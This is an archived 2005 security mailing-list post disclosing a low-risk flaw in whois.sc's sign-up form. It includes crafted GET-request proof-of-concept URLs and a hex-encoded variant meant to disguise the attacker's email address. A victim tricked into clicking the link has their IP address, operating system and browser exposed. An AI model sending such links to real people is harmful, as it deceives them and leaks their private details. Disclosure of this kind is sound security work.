lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <b7a807650511020853w7f9e1848g8de46f1a9159770a@mail.gmail.com>
Date: Wed Nov  2 20:01:21 2005
From: unknown.pentester at gmail.com (unknown unknown)
Subject: whois.sc not-big-deal hole

Title: whois.sc not-big-deal hole
Server-side risk: none
Client-side risk: low risk (private info revealed about the user)

Description:

This might not even be considered a proper security hole, but I
thought it's an interesting way to get the following information about
a user:

- IP Address
- Operating system
- Web browser version

This information can be easily obtained by "tricking" someone to visit
your website and then checking the webserver logs. Email headers also
help, not to mention loud OS detection tools such as xprobe2 and nmap
(which will only work if you're lucky and the "victim" doesn't use a
firewall blocking all incoming traffic).

In this case however, the scenario is a little different because we
use a sign-up service provided by an existing website for our own
purposes (enumeration).

The only limitation of this "trick" is that the attacker needs to use
a different email address for each attack. This is because whois.sc
will set the account activation status to "pending" after requesting
the account activation with your email address for the first time.


The original request to sign-up for an account is a POST request
*similar* to the following:


POST http://www.whois.sc/members/process.html HTTP/1.1
Host: www.whois.sc
Content-Length: 48
action=newaccount&doneurl=&email=test%40test.com


However we can change the request from POST to GET and the application
will happily process the query:

http://www.whois.sc/members/process.html?action=newaccount&doneurl=%252Freverse-ip%252F&email=test%40test.com


PoC:

http://www.whois.sc/members/process.html?action=newaccount&doneurl=%252Freverse-ip%252F&email=attacker%40evilmail.com


Replace "attacker%40evilmail.com" in the previous link with your own
email address (e.g.: myself%40gmail.com) and send it to the "victim".


Also, we could obsfucate our email address by encoding it to hex:

http://www.whois.sc/members/process.html?action=newaccount&doneurl=%252Freverse-ip%252F&email=%61%74%74%61%63%6B%65%72%40%65%76%69%6C%6D%61%69%6C%2E%63%6F%6D


Note: "%40" is "@" in hex. For a good resource to convert strings to
different encodings check out
http://www.thedumbterminal.co.uk/php/stringdecode.php



Regards,

pagvac
Earth, SOLAR SYSTEM

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ